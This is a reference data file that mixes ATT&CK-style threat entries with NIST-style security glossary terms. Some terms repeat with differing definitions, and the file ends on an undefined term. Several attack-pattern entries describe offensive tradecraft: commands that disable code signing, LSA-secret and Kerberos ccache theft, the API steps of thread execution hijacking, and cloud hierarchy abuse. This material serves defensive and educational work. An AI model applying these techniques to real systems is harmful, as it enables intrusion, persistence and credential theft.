Description: Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page. These persistence mechanisms can work within Outlook or be used through Office 365.

Name: Power Settings
Type: attack-pattern
Description: Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.

Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.

For example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down. Adversaries may also extend system lock screen timeout settings. Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.

Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.

Term: activation secret
Definition: A password that is used locally as an activation factor for a multi-factor authenticator.

Term: Instant Messaging (IM)
Definition: a facility for exchanging messages in real-time with other people over the Internet and tracking the progress of the conversation.

Term: MF
Definition: A characteristic of an authentication system or an authenticator that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors.
The three authentication factors are something you know, something you have, and something you are.

Term: risk optimization
Definition: A risk-related process to minimize negative and maximize positive consequences and their respective probabilities; risk optimization depends on risk criteria, including costs and legal requirements.

Term: Computer Security Log Management
Definition: Log management for computer security log data only.

Name: Modify Cloud Resource Hierarchy
Type: attack-pattern
Description: Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. 

IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.

Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.

In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.

Term: Cyber Threat
Definition: The potential for a “threat source” (defined below) to exploit (intentional) or trigger (accidental) a specific vulnerability.

Term: message authentication code (MAC)
Definition: A family of secret-key cryptographic algorithms acting on input data of arbitrary length to produce an output value of a specified length (called the MAC of the input data). The MAC can be employed to provide an authentication of the origin of data and/or data-integrity protection. In this Recommendation, approved MAC algorithms are used to determine families of pseudorandom functions (indexed by the choice of key) that are employed during key derivation.

Term: cryptographic key
Definition: See cryptographic key.

Term: Cryptographic operation
Definition: The execution of a cryptographic algorithm. Cryptographic operations are performed in cryptographic modules.

Term: Authenticator Assurance Level (AAL)
Definition: A measure of the strength of an authentication mechanism and, therefore, the confidence in it, as defined in [NIST SP 800-63-3] in terms of three levels: AAL1 (Some confidence), AAL2 (High confidence), AAL3 (Very high confidence).

Term: POA&M
Definition: A document that identifies tasks needing to be accomplished. It details resources required to accomplish the elements of the plan, any milestones for meeting the tasks, and scheduled milestone completion dates.

Term: certification test and evaluation
Definition: Software, hardware, and firmware security tests conducted during development of an information system component.

Term: <em><strong>min (a, b)</strong></em>
Definition: The minimum of a and b.

Term: Information System User
Definition: The entity, human or machine, that is identified by the userID, authenticated prior to system access, the subject of all access control decisions, and held accountable via the audit reporting system.

Term: VDPO
Definition: The entity with which an agency coordinates internally to resolve reported vulnerabilities.

Term: Key-derivation key
Definition: A key that is used as an input to a key derivation function or key expansion function to derive other keys.

Term: Biometric Information Template
Definition: Biometric Information Template – a [CARD-BIO] data structure indicating Card capability

Term: boundary protection device
Definition: A device (e.g., gateway, router, firewall, guard, or encrypted tunnel) that facilitates the adjudication of different system security policies for connected systems or provides boundary protection. The boundary may be the authorization boundary for a system, the organizational network boundary, or a logical boundary defined by the organization.

Term: RTR
Definition: On a network, a device that determines the best path for forwarding a data packet toward its destination. The router is connected to at least two networks, and is located at the gateway where one network meets another.

Term: information security continuous monitoring (ISCM) program
Definition: A program established to collect information in accordance with pre-established metrics, utilizing information readily available in part through implemented security controls.

Term: hash value/result
Definition: The result of applying a hash function to a message. Also known as a “hash value” or “hash output”.

Term: Ivn
Definition: Block of data representing IV n

Term: Universal Resource Locator
Definition: A uniform resource locator, or URL, is a short string containing an address which refers to an object in the "web." URLs are a subset of URIs.

Term: assurance of integrity
Definition: Quality of being complete and unaltered.

Term: direct prompting attack
Definition: In the generative AI context, an attack conducted by the primary user of the system through query access (e.g., as opposed to through resource control).

Term: Timestamp Packet
Definition: A unit of information that is transmitted by a TTA that contains timestamped_data and a timestamp_signature.

Term: key
Definition: A cryptographic key. In this document, keys generally refer to public key cryptography key pairs used for authentication of users and/or machines (using digital signatures). Examples include identity key and authorized keys. The SSH protocol also uses host keys that are used for authenticating SSH servers to SSH clients connecting them.

Term: credential service provider (CSP)
Definition: A trusted entity whose functions include identity proofing applicants to the identity service and registering authenticators to subscriber accounts. A CSP may be an independent third party.

Term: Hash algorithm
Definition: Algorithm that creates a hash based on a message.

Term: Benchmark
Definition: The root node of an XCCDF benchmark document; may also be the root node of an XCCDF results document (the results of evaluating the XCCDF benchmark document).

Term: formal methods
Definition: A mathematically rigorous technique for the specification, development, and verification of software systems.

Name: Zeus Panda
Type: malware
Description: Zeus Panda is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. Zeus Panda’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.

Term: <em>H</em>
Definition: In LMS and XMSS, the height of the tree. In XMSSMT, the total height of the multi-tree (the trees at each level have a height of H/D).

Term: hash value/result
Definition: The result of applying a hash function to information.

Term: party
Definition: An individual (person), organization, device, or process. Used interchangeably with “entity.”

Term: re-key (a certificate)
Definition: The process of creating a new certificate with a new validity period, serial number, and public key while retaining all other Subscriber information in the original certificate.

Term: <em>Entropy rate</em>
Definition: The rate at which a digitized noise source (or entropy source) provides entropy; it is computed as the assessed amount of entropy provided by a bitstring output from the source, divided by the total number of bits in the bitstring (yielding the assessed bits of entropy per output bit). This will be a value between zero (no entropy) and one.

Term: federated learning
Definition: A type of machine learning in which a model is trained in a decentral­ized fashion using multiple data sources without pooling or combining the data in any centralized location. Federated learning allows entities or devices to collabo­ratively train a global model by exchanging model updates without directly sharing the data that each entity controls.

Term: Identity Ecosystem
Definition: An online environment where individuals can choose from a variety of credentials to use in lieu of passwords for interactions conducted across the internet.

Name: Emissary
Type: malware
Description: Emissary is a Trojan that has been used by Lotus Blossom. It shares code with Elise, with both Trojans being part of a malware group referred to as LStudio.

Term: identity resolution
Definition: The process of collecting information about an applicant to uniquely distinguish an individual within the context of the population that the CSP serves.

Term: cryptographic key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation or signature verification. For the purposes of this document, key requirements shall meet the minimum requirements stated in Table 2 of NIST SP 800-57 Part 1. 
See also Asymmetric keys, Symmetric key.

Name: LSA Secrets
Type: attack-pattern
Description: Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.

Reg can be used to extract from the Registry. Mimikatz can be used to extract secrets from memory.

Name: Compromise Accounts
Type: attack-pattern
Description: Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 

A variety of methods exist for compromising accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials. Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for Phishing for Information or Phishing.

Name: Thread Execution Hijacking
Type: attack-pattern
Description: Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 

Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread </code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.

This is very similar to Process Hollowing but targets an existing process rather than creating a process in a suspended state. 

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.

Term: PSK
Definition: Single key used by IPsec endpoints to authenticate endpoints to each other.

Term: Key Risk Indicator
Definition: A metric used to measure risk.

Term: data use agreement
Definition: executed agreement between a data provider and a data recipient that specifies the terms under which the data can be used.

Name: Code Signing Policy Modification
Type: attack-pattern
Description: Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 

Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS. Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.

Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory. Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS. Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.

To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.

Term: <em>lg(x)</em>
Definition: The base 2 logarithm of the positive real number x.

Term: label flipping
Definition: A type of data poisoning attack in which an adversary is restricted to changing the training labels.

Term: Privacy Capability
Definition: A combination of mutually-reinforcing privacy controls (i.e., safeguards and countermeasures) implemented by technical means (i.e., functionality in hardware, software, and firmware), physical means (i.e., physical devices and protective measures), and procedural means (i.e., procedures performed by individuals).

Term: bidirectional authentication
Definition: The process of both entities involved in a transaction verifying each other.

Term: Category
Definition: The subdivision of a Function into groups of cybersecurity outcomes closely tied to programmatic needs and particular activities.

Name: hcdLoader
Type: malware
Description: hcdLoader is a remote access tool (RAT) that has been used by APT18.

Term: Secure Hash Algorithm
Definition: A hash function specified in FIPS 180-2, the Secure Hash Standard.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation through a system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: Recipient-usage period
Definition: The period of time during which the protected information is processed (e.g., decrypted).

Term: FASC-N
Definition: One of the primary identifiers on the PIV Card for physical access control, as required by FIPS 201. The FASC-N is a fixed length (25 byte) data object that is specified in [NIST SP 800-73-4] and included in several data objects on a PIV Card.

Term: Aggregation
Definition: The consolidation of similar or related information.

Term: trust anchor
Definition: A configured DNSKEY RR or DS RR hash of a DNSKEY RR. A validating DNSSEC-aware resolver uses this public key or hash as a starting point for building the authentication chain to a signed DNS response. In general, a validating resolver will need to obtain the initial values of its trust anchors via some secure or trusted means outside the DNS protocol. The presence of a trust anchor also implies that the resolver should expect the zone to which the trust anchor points to be signed. This is sometimes referred to as a “secure entry point.”

Term: Key-agreement transaction
Definition: A key-establishment event which results in secret keying material that is shared between the parties using a key-agreement scheme.

Term: Key-derivation function
Definition: A function used to derive keying material from a shared secret (or a key) and other information.

Term: metrics
Definition: Tools designed to facilitate decision making and improve performance and accountability through collection, analysis, and reporting of relevant performance-related data.

Term: NIST-approved
Definition: FIPS-approved or NIST-Recommended.

Term: File Signature Anomaly
Definition: A mismatch between the internal file header and its external file name extension; a file name inconsistent with the content of the file (e.g., renaming a graphics file with a non-graphics extension).

Name: NOKKI
Type: malware
Description: NOKKI is a modular remote access tool. The earliest observed attack using NOKKI was in January 2018. NOKKI has significant code overlap with the KONNI malware family. There is some evidence potentially linking NOKKI to APT37.

Name: Create Snapshot
Type: attack-pattern
Description: An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in Revert Cloud Instance where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.

An adversary may Create Cloud Instance, mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.

Term: Keyed-Hash Message Authentication Code
Definition: Keyed-hash Message Authentication Code (as specified in [FIPS 198]) with an approved hash function hash.

Term: purge
Definition: A method of sanitization that applies physical or logical techniques that render Target Data recovery infeasible using state of the art laboratory techniques.

Term: cyberspace exploitation
Definition: Enabling operations and intelligence collection capabilities conducted through the use of computer networks to gather data from target or adversary information systems or networks. 
Note: Within the Department of Defense (DoD), term was approved for deletion from JP 1-02 (DoD Dictionary). Original source of term was JP 1-02 (DoD Dictionary). The military no longer uses this term to describe these operations, but it is still used outside of military operations.

Term: trust relationship
Definition: An agreed upon relationship between two or more system elements that is governed by criteria for secure interaction, behavior, and outcomes relative to the protection of assets.
Note: This refers to trust relationships between system elements implemented by hardware, firmware, and software.

Term: secret key
Definition: A cryptographic key used by a secret-key (symmetric) cryptographic algorithm and that is not made public.

Term: token
Definition: See authenticator type and multi-factor authenticator.

Term: impact level
Definition: See impact value.

Term: Domain of Use
Definition: The intended usage of a format

Term: security categorization
Definition: See security categorization.

Term: activation
Definition: The process of inputting an activation factor into a multi-factor authenticator to enable its use for authentication.

Term: Health Insurance Portability and Accountability Act
Definition: the primary law in the United States that governs the privacy of healthcare information

Term: Wallet
Definition: An application used to generate, manage, store or use private and public keys. A wallet can be implemented as a software or hardware module.

Name: Meteor
Type: malware
Description: Meteor is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. Meteor is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.

Term: Cryptographic primitive
Definition: A low-level cryptographic algorithm used as a basic building block for higher-level cryptographic algorithms.

Term: Forbidden PLMNs
Definition: a list of Public Land Mobile Networks (PLMNs) maintained on the SIM that the phone cannot automatically contact, usually because service was declined by a foreign provider.

Term: Meter
Definition: The number of blocks in the formatted payload.

Term: concept mapping
Definition: Depiction of how data from one information source maps to data from another information source.

Term: COR
Definition: The entity that keeps records of accountable COMSEC material held by COMSEC accounts subject to its oversight.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot.

Term: Source of Randomness
Definition: See Randomness Source.

Term: Geometric Random Variable
Definition: A random variable that takes the value k, a non-negative integer with probability pk(1-p). The random variable x is the number of successes before a failure in an infinite series of Bernoulli trials.

Term: Basic Input/Output System (BIOS)
Definition: Refers collectively to boot firmware based on the conventional BIOS, Extensible Firmware Interface (EFI), and the Unified Extensible Firmware Interface (UEFI).

Term: VRP
Definition: Validated ROA Payload contains {prefix, max length, origin AS} information from an X.509 validated ROA.

Term: compromise
Definition: Disclosure of information to unauthorized persons, or a violation of the security policy of a system in which unauthorized intentional or unintentional disclosure, modification, destruction, or loss of an object may have occurred.

Term: <em>[x]m</em>
Definition: The binary representation of the non-negative integer x, in m bits, where x<2m.

Term: <em>Plen</em>
Definition: The bit length of the payload.

Term: pseudorandom number generator
Definition: An RBG that includes a DRBG mechanism and (at least initially) has access to a source of entropy input. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator.

Name: 2025 Poland Wiper Attacks
Type: campaign
Description: 2025 Poland Wiper Attacks is a Russian state-sponsored campaign that conducted destructive cyberattacks against Polish energy infrastructure in December 2025. Targets included more than 30 wind and photovoltaic farms, a combined heat and power (CHP) plant, and a manufacturing sector company. The attacks on the distributed energy resources (DER) disrupted communications between affected facilities and the distribution system operator, but did not impact electricity generation or heat supply. Across the campaign, threat actors deployed two previously undocumented wiper tools, DynoWiper, a Windows-based wiper and LazyWiper, a PowerShell wiper, distributed via malicious Group Policy Objects. At the CHP plant, threat actors had maintained access since at least March 2025, using that foothold to obtain credentials and move laterally before attempting wiper deployment. Some reporting has assessed the activity to be consistent with Russian Federal Security Service (FSB) threat activity group Dragonfly, also tracked as STATIC TUNDRA, while other reporting attributes the destructive wiper activities to the Russian General Staff Main Intelligence Directorate (GRU) threat activity group ELECTRUM, also tracked as Sandworm Team.

Term: trustworthiness
Definition: The degree to which the security behavior of a component is demonstrably compliant with its stated functionality.

Term: common control provider
Definition: An organizational official responsible for the development, implementation, assessment, and monitoring of common controls (i.e., security controls inherited by information systems).

Term: Forensic science
Definition: The application of science to the law.

Term: Binomial Distribution
Definition: A random variable is binomially distributed if there is an integer n and a probability p such that the random variable is the number of successes in n independent Bernoulli experiments, where the probability of success in a single experiment is p. In a Bernoulli experiment, there are only two possible outcomes.

Term: MF
Definition: A characteristic of an authentication system or a token that uses more than one authentication factor. 
The three types of authentication factors are something you know, something you have, and something you are.

Term: view
Definition: A classification of elements in which each element is associated with exactly one item of the classification.

Term: atomic clock
Definition: A clock referenced to an atomic oscillator. Only clocks with an internal atomic oscillator qualify as atomic clocks.

Term: Consensus model
Definition: A process to achieve agreement within a distributed system on the valid state. Also known as a consensus algorithm, consensus mechanish, consesus method.

Term: Cryptographic module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic module boundary. See FIPS 140.

Term: Distribution
Definition: See Key distribution.

Term: Domain Name System (DNS)
Definition: The system by which Internet domain names and addresses are tracked and regulated as defined by IETF RFC 1034 and other related RFCs.

Name: SplatDropper
Type: malware
Description: SplatDropper is a loader that utilizes native windows API to deliver its payload to the victim environment. SplatDropper has been delivered through RAR archives and used legitimate executable for DLL side-loading. SplatDropper is known to be leveraged by Mustang Panda and was first observed utilized in 2025.

Term: Foundational Defect Checks
Definition: Defect checks that expose ineffectiveness of controls that are fundamental to the purposes of the capability (e.g., HWAM, or SWAM, or Configuration Setting Management) in which the defect check appears.

Name: Neo-reGeorg
Type: malware
Description: Neo-reGeorg is an open-source web shell designed as a restructuring of reGeorg with improved usability, security, and fixes for exising reGeorg bugs.

Term: Exercise
Definition: A simulation of an emergency designed to validate the viability of one or more aspects of an IT plan.

Name: ConnectWise
Type: tool
Description: ConnectWise is a legitimate remote administration tool that has been used since at least 2016 by threat actors including MuddyWater and GOLD SOUTHFIELD to connect to and conduct lateral movement in target environments.

Term: Recovery Point Objective
Definition: The point in time to which data must be recovered after an outage.

Term: enrollment manager
Definition: The management role that is responsible for assigning user identities to management and non-management roles.

Term: On-Demand Scanning
Definition: Launching scans of a computer manually as needed.

Name: Exfiltration to Cloud Storage
Type: attack-pattern
Description: Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Term: Key wrapping
Definition: A method of encrypting and decrypting keys and (possibly) associated data using symmetric-key cryptography; both confidentiality and integrity protection are provided; see SP 800-38F.

Term: <em>SEED</em>
Definition: An FFC domain parameter; an initialization value that is used during domain parameter generation that can also be used to provide assurance at a later time that the resulting domain parameters were generated using a canonical process.

Term: security incident
Definition: An occurrence that actually or potentially jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Term: Aggregation
Definition: See “Event Aggregation”.

Name: Epic
Type: malware
Description: Epic is a backdoor that has been used by Turla.

Term: controls
Definition: Policies, procedures, guidelines, practices, or organizational structures that manage security, privacy, and other risks.

Name: Agent.btz
Type: malware
Description: Agent.btz is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008.

Name: Web Cookies
Type: attack-pattern
Description: Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from Steal Web Session Cookie and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces. The generation of web cookies often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources (Web Session Cookie), which may bypass multi-factor and other authentication protection mechanisms.

Name: POWERSTATS
Type: malware
Description: POWERSTATS is a PowerShell-based first stage backdoor used by MuddyWater.

Term: SHA-256(M)
Definition: SHA-256 hash function as specified in [3].

Term: Supporting Parties
Definition: Providers of external system services to the manufacturer through a variety of consumer-producer relationships including but not limited to: joint ventures; business partnerships; outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements); licensing agreements; and/or supply chain exchanges. Supporting services include, for example, Telecommunications, engineering services, power, water, software, tech support, and security.

Term: <em>(n, e)</em>
Definition: RSA public key.

Term: Random bit
Definition: A bit for which an attacker has exactly a 50% probability of success of guessing the value of the bit as either zero or one.

Term: risk analysis
Definition: The process of identifying risks to agency operations (including mission, functions, image, or reputation), agency assets, or individuals by determining the probability of occurrence, the resulting impact, and additional security controls that would mitigate this impact. Part of risk management, synonymous with risk analysis. Incorporates threat and vulnerability analyses.

Term: Latency
Definition: The delay in processing or in availability.

Term: system security plan
Definition: Formal document that provides an overview of the security requirements for the information system and describes the security controls in place or planned for meeting those requirements.

Term: MQV
Definition: The Menezes-Qu-Vanstone key-agreement primitive.

Name: Remote Desktop Protocol
Type: attack-pattern
Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). 

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features or Terminal Services DLL for Persistence.

Term: GSM
Definition: A set of standards for second generation, cellular networks currently maintained by the 3rd Generation Partnership Project (3GPP).

Name: Re-opened Applications
Type: attack-pattern
Description: Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in". When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory. Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish Persistence by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.

Term: system security plan
Definition: Formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements. See System Security Plan or Information Security Program Plan.

Name: DealersChoice
Type: malware
Description: DealersChoice is a Flash exploitation framework used by APT28.

Term: tiered label
Definition: Indicates the degree to which a product has satisfied a specific standard, sometimes based on attaining increasing levels of performance against specified criteria. Tiers or grades are often represented by colors (e.g., red-yellow-green), numbers of icons (e.g., stars or security shields), or other appropriate metaphors (e.g., precious metals: gold-silver-bronze).

Name: 2016 Ukraine Electric Power Attack
Type: campaign
Description: 2016 Ukraine Electric Power Attack was a Sandworm Team campaign during which they used Industroyer malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by Sandworm Team.

Name: RansomHub
Type: malware
Description: RansomHub is a ransomware-as-a-service (RaaS) offering with Windows, ESXi, Linux, and FreeBSD versions that has been in use since at least 2024 to target organizations in multiple sectors globally. RansomHub operators may have purchased and rebranded resources from Knight (formerly Cyclops) Ransomware which shares infrastructure, feature, and code overlaps with RansomHub.

Term: element
Definition: A statement about an ISCM concept that is true for a well-implemented ISCM program.

Term: system security plan
Definition: Formal document that provides an overview of the security requirements for the system and describes the security controls in place or planned for meeting those requirements.

Name: Application Isolation and Sandboxing
Type: course-of-action
Description: Application Isolation and Sandboxing refers to the technique of restricting the execution of code to a controlled and isolated environment (e.g., a virtual environment, container, or sandbox). This method prevents potentially malicious code from affecting the rest of the system or network by limiting access to sensitive resources and critical operations. The goal is to contain threats and minimize their impact. This mitigation can be implemented through the following measures:

Browser Sandboxing:

- Use Case: Implement browser sandboxing to isolate untrusted web content and prevent malicious web pages or scripts from accessing sensitive system resources or initiating unauthorized downloads.
- Implementation: Use browsers with built-in sandboxing features (e.g., Google Chrome, Microsoft Edge) or deploy enhanced browser security frameworks that limit the execution scope of active content. Consider controls that monitor or restrict script-based file generation and downloads commonly abused in evasion techniques like HTML smuggling.

Application Virtualization:

- Use Case: Deploy critical or high-risk applications in a virtualized environment to ensure any compromise does not affect the host system.
- Implementation: Use application virtualization platforms to run applications in isolated environments.

Email Attachment Sandboxing:

- Use Case: Route email attachments to a sandbox environment to detect and block malware before delivering emails to end-users.
- Implementation: Integrate security solutions with sandbox capabilities to analyze email attachments.

Endpoint Sandboxing:

- Use Case: Run all downloaded files and applications in a restricted environment to monitor their behavior for malicious activity.
- Implementation: Use endpoint protection tools for sandboxing at the endpoint level.

Term: federal agency
Definition: An executive department specified in 5 U.S.C. Sec. 101; a military department specified in 5 U.S.C. Sec. 102; an independent establishment as defined in 5 U.S.C. Sec. 104(1); and a wholly owned Government corporation fully subject to the provisions of 31 U.S.C. Chapter 91.

Term: Subdirectory
Definition: A directory contained within another directory.

Name: DNS Server
Type: attack-pattern
Description: Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic (DNS). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.

Term: Target Identification and Analysis Techniques
Definition: Information security testing techniques, mostly active and generally conducted using automated tools, that are used to identify systems, ports, services, and potential vulnerabilities. Target identification and analysis techniques include network discovery, network port and service identification, vulnerability scanning, wireless scanning, and application security testing.

Term: Capability, Manage and Assess Risk
Definition: The process of identifying, assessing, and responding to risk.

Term: nonce-respecting
Definition: A setting in which a nonce is never repeated for the encryption algorithm under a given key.

Term: Separation of Duty (SOD)
Definition: refers to the principle that no user should be given enough privileges to misuse the system on their own. For example, the person authorizing a paycheck should not also be the one who can prepare them. Separation of duties can be enforced either statically (by defining conflicting roles, i.e., roles which cannot be executed by the same user) or dynamically (by enforcing the control at access time). An example of dynamic separation of duty is the two-person rule. The first user to execute a two-person operation can be any authorized user, whereas the second user can be any authorized user different from the first [R.S. Sandhu., and P Samarati, “Access Control: Principles and Practice,” IEEE Communications Magazine 32(9), September 1994, pp. 40-48.]. There are various types of SOD, an important one is history-based SOD that regulate for example, the same subject (role) cannot access the same object for variable number of times.

Name: Ccache Files
Type: attack-pattern
Description: Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. 

The <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using <code>kinit</code>, which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.

Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform Pass the Ticket attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform Privilege Escalation. Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further Lateral Movement. On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.

Term: Cross-certification
Definition: A process whereby two CAs establish a trust relationship between them by each CA signing a certificate containing the public key of the other CA.

Term: Key Management Policy
